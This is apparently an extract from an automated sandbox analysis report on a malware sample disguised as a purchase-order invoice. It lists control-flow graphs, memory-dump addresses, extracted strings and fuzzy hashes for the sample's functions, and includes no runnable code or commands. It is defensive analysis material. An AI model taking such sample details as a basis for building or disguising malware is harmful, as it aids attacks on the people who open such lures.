                                                            control_flow_graph 0 7ffd34970e29-7ffd34970e9c 4 7ffd34970e9e-7ffd34970ecf 0->4 5 7ffd34970ee6-7ffd34970ee8 0->5 6 7ffd34971027-7ffd34971036 4->6 7 7ffd34970ed5-7ffd34970ed6 4->7 5->6 8 7ffd34970ee9-7ffd34970efb 5->8 14 7ffd34971038-7ffd34971039 6->14 9 7ffd34970ed9-7ffd34970ee5 7->9 10 7ffd34970efc-7ffd34970f00 8->10 9->5 12 7ffd34970f03-7ffd34970f1a 10->12 13 7ffd34970f02 10->13 12->6 21 7ffd34970f20-7ffd34970f33 12->21 13->12 15 7ffd34970f38 13->15 19 7ffd3497103b 14->19 20 7ffd3497103c-7ffd3497105a 14->20 17 7ffd34970fb4-7ffd34970fb6 15->17 18 7ffd34970f3a 15->18 17->6 24 7ffd34970fb8-7ffd34970fea 17->24 22 7ffd34970f81 18->22 23 7ffd34970f3c-7ffd34970f45 18->23 19->20 25 7ffd3497105b-7ffd34971069 20->25 30 7ffd34970fa4-7ffd34970fb3 21->30 31 7ffd34970f35-7ffd34970f36 21->31 22->6 28 7ffd34970f87-7ffd34970fa2 22->28 23->9 27 7ffd34970f47-7ffd34970f65 23->27 24->25 39 7ffd34970fec-7ffd34970fef 24->39 35 7ffd3497106b-7ffd34971097 25->35 27->6 38 7ffd34970f6b-7ffd34970f7e 27->38 28->30 30->17 31->10 31->15 40 7ffd349710cc-7ffd349710e4 35->40 41 7ffd34971099-7ffd349710b0 35->41 38->22 39->35 42 7ffd34970ff1 39->42 43 7ffd34971121-7ffd34971157 40->43 41->43 44 7ffd349710b2-7ffd349710ca 41->44 42->14 46 7ffd34970ff3-7ffd34971026 42->46 52 7ffd3497118c-7ffd349711a4 43->52 53 7ffd34971159-7ffd34971170 43->53 44->40 55 7ffd349711e1-7ffd34971217 53->55 56 7ffd34971172-7ffd3497118a 53->56 63 7ffd3497124c-7ffd34971264 55->63 64 7ffd34971219-7ffd34971230 55->64 56->52 65 7ffd349712a1-7ffd349712d9 64->65 66 7ffd34971232-7ffd3497124a 64->66 71 7ffd34971323-7ffd34971345 65->71 72 7ffd349712db-7ffd34971309 65->72 66->63 76 7ffd34971349-7ffd34971354 71->76 74 7ffd3497130f-7ffd34971322 72->74 75 7ffd349713b5-7ffd349713c5 72->75 74->71 74->75 79 7ffd349713c7 75->79 80 7ffd349713c8-7ffd349713ef 75->80 76->75 77 7ffd34971356-7ffd34971380 76->77 83 7ffd349713f1-7ffd349713ff 77->83 86 7ffd34971382-7ffd34971383 77->86 79->80 80->83 85 7ffd34971401-7ffd34971427 83->85 91 7ffd3497145c-7ffd34971474 85->91 92 7ffd34971429-7ffd34971440 85->92 86->76 88 7ffd34971385 86->88 88->85 90 7ffd34971387-7ffd349713b4 88->90 94 7ffd349714b1-7ffd349714bf 92->94 95 7ffd34971442-7ffd3497145a 92->95 99 7ffd349714c1-7ffd349714fa 94->99 95->91 95->99 105 7ffd3497156b-7ffd34971579 99->105 106 7ffd349714fc-7ffd349714fe 99->106 107 7ffd3497157a-7ffd34971623 105->107 106->107 108 7ffd34971500-7ffd34971528 106->108 125 7ffd34971637-7ffd34971641 107->125 126 7ffd34971625-7ffd3497162f 107->126 116 7ffd3497153c-7ffd34971549 108->116 117 7ffd3497152a-7ffd3497153b 108->117 117->116 127 7ffd34971631-7ffd34971633 126->127 127->127 128 7ffd34971635-7ffd34971636 127->128 128->125
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2151235986.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34970000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A$JW9:$vBN_
                                                            • API String ID: 0-714564257
                                                            • Opcode ID: ab902b41bccda5ba303df533a3d882c7be86abc66a9ac298cc70ecb75b635cb4
                                                            • Instruction ID: 52eb67be77243345b12db746835916ef70f2be67d7a7bd51decc955d964f7d55
                                                            • Opcode Fuzzy Hash: ab902b41bccda5ba303df533a3d882c7be86abc66a9ac298cc70ecb75b635cb4
                                                            • Instruction Fuzzy Hash: 6B422672A0D7C54FEB56DB288CA65A47FE0EF57300B0941FED589CB297D92CA806C391
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD34894600 Relevance: 2.9, Strings: 2, Instructions: 444COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: _w4$fish
                                                            • API String ID: 0-1957416594
                                                            • Opcode ID: 6de5db7e093588f1367c7435c53d6412606bc3851a1aaefc74eb458a8e948ced
                                                            • Instruction ID: eff5b9b50482b49185a1efed27c7154640e198f599aeaac706a7f6ebe6486d54
                                                            • Opcode Fuzzy Hash: 6de5db7e093588f1367c7435c53d6412606bc3851a1aaefc74eb458a8e948ced
                                                            • Instruction Fuzzy Hash: BBC14931B1CE490FE75DEB6898B51BA77E1EF97710B04017ED58BC3293DE28A8029781
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD34891030 Relevance: 2.4, Strings: 1, Instructions: 1173COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 304 7ffd34891030-7ffd3489108a call 7ffd34890640 call 7ffd34890648 312 7ffd3489108c-7ffd3489109c 304->312 313 7ffd3489109e-7ffd348910b3 304->313 312->313 316 7ffd348910b4-7ffd348910d9 312->316 318 7ffd348910db-7ffd348910e0 316->318 319 7ffd348910e2-7ffd348910e6 316->319 320 7ffd348910e9-7ffd3489121d call 7ffd348906e0 call 7ffd348906c8 318->320 319->320 345 7ffd34891238-7ffd34891258 call 7ffd348906e8 320->345 346 7ffd3489121f-7ffd34891231 call 7ffd34890e08 320->346 352 7ffd3489125a-7ffd34891284 345->352 353 7ffd3489128b-7ffd348912a2 call 7ffd348906e8 345->353 346->345 352->353 357 7ffd348912d5-7ffd348912ec call 7ffd348906e8 353->357 358 7ffd348912a4-7ffd348912ce 353->358 364 7ffd348912ee-7ffd34891318 357->364 365 7ffd3489131f-7ffd34891336 call 7ffd348906e8 357->365 358->357 364->365 371 7ffd34891338-7ffd34891362 365->371 372 7ffd34891369-7ffd34891416 call 7ffd34890680 365->372 371->372 392 7ffd34891418-7ffd3489142a call 7ffd34890e08 372->392 393 7ffd34891431-7ffd34891454 call 7ffd348906e8 372->393 392->393 399 7ffd34891456-7ffd34891480 393->399 400 7ffd34891487-7ffd348914a1 call 7ffd348906e8 393->400 399->400 404 7ffd348914a3-7ffd348914cd 400->404 405 7ffd348914d4-7ffd348914ee call 7ffd348906e8 400->405 404->405 411 7ffd348914f0-7ffd3489151a 405->411 412 7ffd34891521-7ffd3489153b call 7ffd348906e8 405->412 411->412 417 7ffd3489153d-7ffd34891567 412->417 418 7ffd3489156e-7ffd34891a35 call 7ffd34890690 call 7ffd34890688 call 7ffd348906d0 call 7ffd34890e80 call 7ffd348906d0 call 7ffd348906b0 call 7ffd34890e50 call 7ffd34890e80 call 7ffd34890840 412->418 417->418 529 7ffd34891a3a-7ffd34891b08 call 7ffd34890750 call 7ffd34890668 418->529 547 7ffd34891cae-7ffd34891cd0 529->547 548 7ffd34891b0e-7ffd34891b4b 529->548 557 7ffd34891b56-7ffd34891ca4 548->557 558 7ffd34891b4d-7ffd34891b53 548->558 557->547 562 7ffd34891ca6-7ffd34891ca9 557->562 558->557
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: {x4
                                                            • API String ID: 0-3047784844
                                                            • Opcode ID: 5781eedfeeb62b739f9b76b3a2c1f34a890d5056d1cb20519e46dd32de7215d4
                                                            • Instruction ID: ede51514c0b9a5fcd4a6b9590b388889052bd114bf7f260f1055f94e143316b1
                                                            • Opcode Fuzzy Hash: 5781eedfeeb62b739f9b76b3a2c1f34a890d5056d1cb20519e46dd32de7215d4
                                                            • Instruction Fuzzy Hash: 35728D2071894A4FEB98FBBC80A977E76D2EF9A301B6441B9E40DC73D3DD68AC418351
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD3497026B Relevance: 2.3, Strings: 1, Instructions: 1011COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 563 7ffd3497026b-7ffd3497026d 564 7ffd349703b1-7ffd349703b7 563->564 565 7ffd3497026e-7ffd3497027c 563->565 568 7ffd349703b9-7ffd349703c8 564->568 567 7ffd34970284-7ffd34970286 565->567 569 7ffd349702f7-7ffd34970306 567->569 570 7ffd34970288-7ffd34970289 567->570 572 7ffd349703c9-7ffd34970427 568->572 571 7ffd34970307-7ffd34970309 569->571 573 7ffd3497024f-7ffd3497026a 570->573 574 7ffd3497028b 570->574 571->564 575 7ffd3497030a-7ffd34970348 571->575 586 7ffd3497045c-7ffd34970474 572->586 587 7ffd34970429-7ffd34970440 572->587 573->563 574->571 577 7ffd3497028d 574->577 575->568 603 7ffd3497034a-7ffd3497034d 575->603 580 7ffd349702d4 577->580 581 7ffd3497028f-7ffd349702a0 577->581 580->564 583 7ffd349702da-7ffd349702f5 580->583 588 7ffd349702a2-7ffd349702b8 581->588 589 7ffd34970235-7ffd3497023b 581->589 583->569 592 7ffd349704b1-7ffd349704d0 587->592 593 7ffd34970442-7ffd3497045a 587->593 588->564 594 7ffd349702be-7ffd349702d1 588->594 589->564 595 7ffd34970241-7ffd3497024e 589->595 596 7ffd349704d1-7ffd34970500 592->596 593->586 593->596 594->580 595->573 608 7ffd34970571-7ffd34970590 596->608 609 7ffd34970502-7ffd34970534 596->609 603->572 605 7ffd3497034f 603->605 606 7ffd34970351-7ffd3497035f 605->606 607 7ffd34970396-7ffd349703b0 605->607 606->607 612 7ffd34970592-7ffd34970595 608->612 613 7ffd34970597-7ffd349705c0 608->613 612->613 619 7ffd34970631-7ffd3497067a 613->619 620 7ffd349705c2-7ffd349705f4 613->620 627 7ffd349706eb-7ffd349706f8 619->627 628 7ffd3497067c-7ffd3497067e 619->628 629 7ffd349706fa-7ffd3497073c 627->629 628->629 630 7ffd34970680 628->630 637 7ffd3497073e-7ffd34970772 629->637 638 7ffd34970786-7ffd3497078b 629->638 631 7ffd34970682-7ffd349706a8 630->631 632 7ffd349706c6-7ffd349706c7 630->632 639 7ffd349706bc-7ffd349706c5 631->639 640 7ffd349706aa-7ffd349706b9 631->640 641 7ffd34970a42-7ffd34970a56 637->641 642 7ffd34970778-7ffd34970784 637->642 638->641 643 7ffd3497078c-7ffd3497079e 638->643 639->632 640->639 653 7ffd34970a57-7ffd34970ab7 641->653 645 7ffd34970785 642->645 646 7ffd3497079f-7ffd349707a5 643->646 645->638 647 7ffd349707db 646->647 648 7ffd349707a7-7ffd349707bd 646->648 650 7ffd349707dd 647->650 651 7ffd34970857-7ffd34970859 647->651 648->641 657 7ffd349707c3-7ffd349707d6 648->657 654 7ffd34970824 650->654 655 7ffd349707df-7ffd349707f0 650->655 651->641 656 7ffd3497085a-7ffd34970872 651->656 662 7ffd34970aec-7ffd34970b04 653->662 663 7ffd34970ab9-7ffd34970ad0 653->663 654->641 661 7ffd3497082a-7ffd34970845 654->661 655->645 664 7ffd349707f2-7ffd34970808 655->664 673 7ffd349708e3-7ffd349708f0 656->673 674 7ffd34970874-7ffd34970877 656->674 672 7ffd34970847-7ffd34970856 657->672 675 7ffd349707d8-7ffd349707d9 657->675 661->672 668 7ffd34970b41-7ffd34970b77 662->668 663->668 669 7ffd34970ad2-7ffd34970aeb 663->669 664->641 670 7ffd3497080e-7ffd34970821 664->670 681 7ffd34970bac-7ffd34970bc4 668->681 682 7ffd34970b79-7ffd34970b90 668->682 669->662 670->654 672->651 679 7ffd349708f3 673->679 674->679 680 7ffd34970879 674->680 675->646 675->647 679->641 686 7ffd349708f9-7ffd3497090c 679->686 683 7ffd349708c0 680->683 684 7ffd3497087b-7ffd349708a2 680->684 687 7ffd34970c01-7ffd34970c37 682->687 688 7ffd34970b92-7ffd34970bab 682->688 690 7ffd349708c3-7ffd349708e1 683->690 691 7ffd349708c2 683->691 684->641 695 7ffd349708a8-7ffd349708be 684->695 700 7ffd3497097d-7ffd34970990 686->700 701 7ffd3497090e-7ffd34970912 686->701 703 7ffd34970c6c-7ffd34970c84 687->703 704 7ffd34970c39-7ffd34970c50 687->704 688->681 690->673 691->690 695->641 695->683 702 7ffd34970993 700->702 701->702 705 7ffd34970914 701->705 702->641 706 7ffd34970999-7ffd349709b5 702->706 707 7ffd34970cc1-7ffd34970cfe 704->707 708 7ffd34970c52-7ffd34970c6a 704->708 710 7ffd34970974-7ffd3497097b 705->710 717 7ffd349709d2-7ffd349709e6 706->717 718 7ffd349709b7-7ffd349709cc 706->718 708->703 710->700 717->653 720 7ffd349709e8-7ffd349709ed 717->720 718->717 720->710 722 7ffd349709ef 720->722 722->641
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2151235986.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34970000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A
                                                            • API String ID: 0-3554254475
                                                            • Opcode ID: ed6ff4ebe8af9b8a935909ac72c44142423da291fb3a8b4f1fae31bc015bb6de
                                                            • Instruction ID: bfeab3b99e9aa80ca05837423a22d3f2b69e3375106051156c40b9d7630bd3c3
                                                            • Opcode Fuzzy Hash: ed6ff4ebe8af9b8a935909ac72c44142423da291fb3a8b4f1fae31bc015bb6de
                                                            • Instruction Fuzzy Hash: E662487290D6864FEB56DB288CA55A87FE0FF93300F0945FED189CB197D92CA806C791
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD34892528 Relevance: 2.0, Strings: 1, Instructions: 732COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 723 7ffd34892528-7ffd34894ae1 call 7ffd348949a0 730 7ffd34894b04-7ffd34894b13 723->730 731 7ffd34894b15-7ffd34894b2f call 7ffd348949a0 call 7ffd348949f0 730->731 732 7ffd34894ae3-7ffd34894af9 call 7ffd348949a0 call 7ffd348949f0 730->732 741 7ffd34894afb-7ffd34894b02 732->741 742 7ffd34894b30-7ffd34894b80 732->742 741->730 746 7ffd34894b8c-7ffd34894bc3 742->746 747 7ffd34894b82-7ffd34894b87 call 7ffd34894148 742->747 750 7ffd34894bc9-7ffd34894bd4 746->750 751 7ffd34894dbf-7ffd34894e29 746->751 747->746 752 7ffd34894bd6-7ffd34894be4 750->752 753 7ffd34894c48-7ffd34894c4d 750->753 781 7ffd34894e46-7ffd34894e70 751->781 782 7ffd34894e2b-7ffd34894e31 751->782 752->751 757 7ffd34894bea-7ffd34894bf9 752->757 754 7ffd34894c4f-7ffd34894c5b 753->754 755 7ffd34894cc0-7ffd34894cca 753->755 754->751 758 7ffd34894c61-7ffd34894c74 754->758 760 7ffd34894cec-7ffd34894cf4 755->760 761 7ffd34894ccc-7ffd34894cd9 call 7ffd34894168 755->761 762 7ffd34894bfb-7ffd34894c2b 757->762 763 7ffd34894c2d-7ffd34894c38 757->763 766 7ffd34894cf7-7ffd34894d02 758->766 760->766 776 7ffd34894cde-7ffd34894cea 761->776 762->763 769 7ffd34894c79-7ffd34894c7c 762->769 763->751 765 7ffd34894c3e-7ffd34894c46 763->765 765->752 765->753 766->751 770 7ffd34894d08-7ffd34894d18 766->770 773 7ffd34894c7e-7ffd34894c8e 769->773 774 7ffd34894c92-7ffd34894c9a 769->774 770->751 775 7ffd34894d1e-7ffd34894d2b 770->775 773->774 774->751 778 7ffd34894ca0-7ffd34894cbf 774->778 775->751 777 7ffd34894d31-7ffd34894d4e 775->777 776->760 788 7ffd34894d4f 777->788 785 7ffd34894e71-7ffd34894ec5 782->785 786 7ffd34894e33-7ffd34894e44 782->786 801 7ffd34894ec7-7ffd34894ed7 785->801 802 7ffd34894ed9-7ffd34894f11 785->802 786->781 786->782 789 7ffd34894d59-7ffd34894d62 788->789 790 7ffd34894d51 788->790 794 7ffd34894dad-7ffd34894dbe 789->794 795 7ffd34894d64-7ffd34894d6f 789->795 790->751 793 7ffd34894d53-7ffd34894d57 790->793 793->789 795->794 799 7ffd34894d71-7ffd34894d88 795->799 799->788 807 7ffd34894d8a-7ffd34894da8 call 7ffd34894168 799->807 801->801 801->802 808 7ffd34894f68-7ffd34894f6f 802->808 809 7ffd34894f13-7ffd34894f19 802->809 807->794 812 7ffd34894f71-7ffd34894f72 808->812 813 7ffd34894fb2-7ffd34894fdb 808->813 809->808 810 7ffd34894f1b-7ffd34894f1c 809->810 814 7ffd34894f1f-7ffd34894f22 810->814 816 7ffd34894f75-7ffd34894f78 812->816 818 7ffd34894f28-7ffd34894f35 814->818 819 7ffd34894fdc-7ffd34894ff1 814->819 816->819 820 7ffd34894f7a-7ffd34894f8b 816->820 823 7ffd34894f37-7ffd34894f5e 818->823 824 7ffd34894f61-7ffd34894f66 818->824 829 7ffd34894ffb-7ffd34895081 819->829 830 7ffd34894ff3-7ffd34894ffa 819->830 821 7ffd34894fa9-7ffd34894fb0 820->821 822 7ffd34894f8d-7ffd34894f93 820->822 821->813 821->816 822->819 825 7ffd34894f95-7ffd34894fa5 822->825 823->824 824->808 824->814 825->821 830->829
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: d
                                                            • API String ID: 0-2564639436
                                                            • Opcode ID: e795d61e89cff555b05a6f70e675eeb261c4911db530846e36bea8e0b1eadfc2
                                                            • Instruction ID: 2ac8d3c299f84610294e9f273878251a11915fd51eb9d3cf42dd29dd53efc04a
                                                            • Opcode Fuzzy Hash: e795d61e89cff555b05a6f70e675eeb261c4911db530846e36bea8e0b1eadfc2
                                                            • Instruction Fuzzy Hash: 87224531B1CE4A0FE759DF2894E15B17BD1EF96314B1442BAD98EC7197EE28F8428780
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD348995B0 Relevance: 1.6, Instructions: 1645COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c9a7bb7381143636c02f901997e546eac0675ab9016fafb1f82ffcb6c3ccfcb6
                                                            • Instruction ID: 46ca56c76114a5bd756789e824eb4b8a54b482db994d683556cb76d6763e5700
                                                            • Opcode Fuzzy Hash: c9a7bb7381143636c02f901997e546eac0675ab9016fafb1f82ffcb6c3ccfcb6
                                                            • Instruction Fuzzy Hash: C8C2D331B09A598FDBE8DB18C4A56B977E1FF5A300F1401BAD14EC72A2DE78AC41DB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD348A0395 Relevance: 1.4, Instructions: 1356COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f7cd57fa968431bf998e328c76442bf48792f6adf6bf5f43479884e976d9af1d
                                                            • Instruction ID: f47daa089f33d713f8608a63402ef15b1acb89a182767fe18e230294d37b706a
                                                            • Opcode Fuzzy Hash: f7cd57fa968431bf998e328c76442bf48792f6adf6bf5f43479884e976d9af1d
                                                            • Instruction Fuzzy Hash: 6D727631B0DB4A4FE399DB28C4A15B177E1FF97310B0446BED58AC7292DE28E846C791
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD34898EA5 Relevance: 1.1, Instructions: 1102COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3724615b21c7fc589ab6b9011d1594468f3b7b269bad73e7bd422e0282d4d256
                                                            • Instruction ID: ecfea1e96d80bc153632644914878181edc0fb223284dae3fc1aed270393f9ee
                                                            • Opcode Fuzzy Hash: 3724615b21c7fc589ab6b9011d1594468f3b7b269bad73e7bd422e0282d4d256
                                                            • Instruction Fuzzy Hash: 81724B30A1EAC54FE7E9D71C88A65B53BD0EF4B300F0405BDD68DCB9A2D95CAC0697A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD348995A8 Relevance: .9, Instructions: 928COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 937ca6be0f2346e52d218b072ff4ef030dcc9d6fa4c8380ffa37751ed2ae09d9
                                                            • Instruction ID: 35073fd13f3a410848780f1e463e175a074ea8795eac2ef7db7482c5420192e1
                                                            • Opcode Fuzzy Hash: 937ca6be0f2346e52d218b072ff4ef030dcc9d6fa4c8380ffa37751ed2ae09d9
                                                            • Instruction Fuzzy Hash: D152B630B0CA094FDB68EB2CD4A56797BE1FF5A305B14017EE54EC7292DE28BC429785
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD3489DA70 Relevance: .6, Instructions: 641COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6c497edcbeb1a4cd2619f07229e44c280cb2513f51b34978834292c406a20273
                                                            • Instruction ID: a96a5cd32f42ee43ae28ec954199b341ce001ff77e3c85ea1800da0c46e85378
                                                            • Opcode Fuzzy Hash: 6c497edcbeb1a4cd2619f07229e44c280cb2513f51b34978834292c406a20273
                                                            • Instruction Fuzzy Hash: FF120732B0DE464FE7A9DB2884A69753FD2FF96311B0401BED58EC71D2DD2DA8069381
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD34897390 Relevance: .5, Instructions: 509COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0cb308d3d8196a43272b8c03fc60198e96c7fb7271534f6de8bd62c18d447646
                                                            • Instruction ID: 52c154d2ac1572de6d4b8344ee34b2909c4e6c33426a5adde10283e5599f60a9
                                                            • Opcode Fuzzy Hash: 0cb308d3d8196a43272b8c03fc60198e96c7fb7271534f6de8bd62c18d447646
                                                            • Instruction Fuzzy Hash: 88E10031B0CE468BEB6CAB2884A15B677D1EF96314B2445BDD54BC75C2DE2CF8429780
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD3489FCCD Relevance: .5, Instructions: 479COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: caea250a91450b44b705403023f52d1f4adfaa894bf02c426f27d0afecd7dcb3
                                                            • Instruction ID: 641e3a29039cad31e3b90c1ef1d3bc19f75c68c6900b3e8142aee1d5801bed3c
                                                            • Opcode Fuzzy Hash: caea250a91450b44b705403023f52d1f4adfaa894bf02c426f27d0afecd7dcb3
                                                            • Instruction Fuzzy Hash: 68E12A31B1CD4A4FE7A8DB1CC4A66A97BD1FF9A310F0405B9D64DCB692CE2CAC468741
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD3489BC90 Relevance: .4, Instructions: 440COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b3c3a56222e20bff21b1121ea0306bbac620ad78cf3f6faf4064926f4bd470c0
                                                            • Instruction ID: b04bae7e9e328c1ec61fce47685d4fd4a095fd873278b3fb3a00a0c31dc27601
                                                            • Opcode Fuzzy Hash: b3c3a56222e20bff21b1121ea0306bbac620ad78cf3f6faf4064926f4bd470c0
                                                            • Instruction Fuzzy Hash: 20D14931A0CF864FE31DCB2984E51B57BE2FFD6301B14867ED5C6C7295DA28E4468781
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD348967C8 Relevance: .4, Instructions: 423COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 454d9fce1ccd7c1feaefb12632485e6135c9c6f3fdd12a199c916c95503020f8
                                                            • Instruction ID: 37dfc2f73921f8141914f9d14ad1ea152c074e4415edc1b1dde746e8c1afadf2
                                                            • Opcode Fuzzy Hash: 454d9fce1ccd7c1feaefb12632485e6135c9c6f3fdd12a199c916c95503020f8
                                                            • Instruction Fuzzy Hash: 7FD17831B1EA468FE7A8DB28C4A45B977E1FF82300F10417ED64AC7192DE69A846C790
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD3489AD18 Relevance: .2, Instructions: 234COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffd34890000_PO-inv-CQV20(92315).jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 79d5694c813c25b97e67bb4e006d0f6a1b5a3c23a6c7c92e90fe8d6b5fb8a238
                                                            • Instruction ID: c949cbf6c9b9069264cf399dd97e0460555004917ca223981447f4f143fe41b1
                                                            • Opcode Fuzzy Hash: 79d5694c813c25b97e67bb4e006d0f6a1b5a3c23a6c7c92e90fe8d6b5fb8a238
                                                            • Instruction Fuzzy Hash: B1519626A8EBE60FE713477488A10957FB0AE1362031E55EBC5D4CF0E3D64D684AE762
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD348A4C62 Relevance: .2, Instructions: 174COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2150884061.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
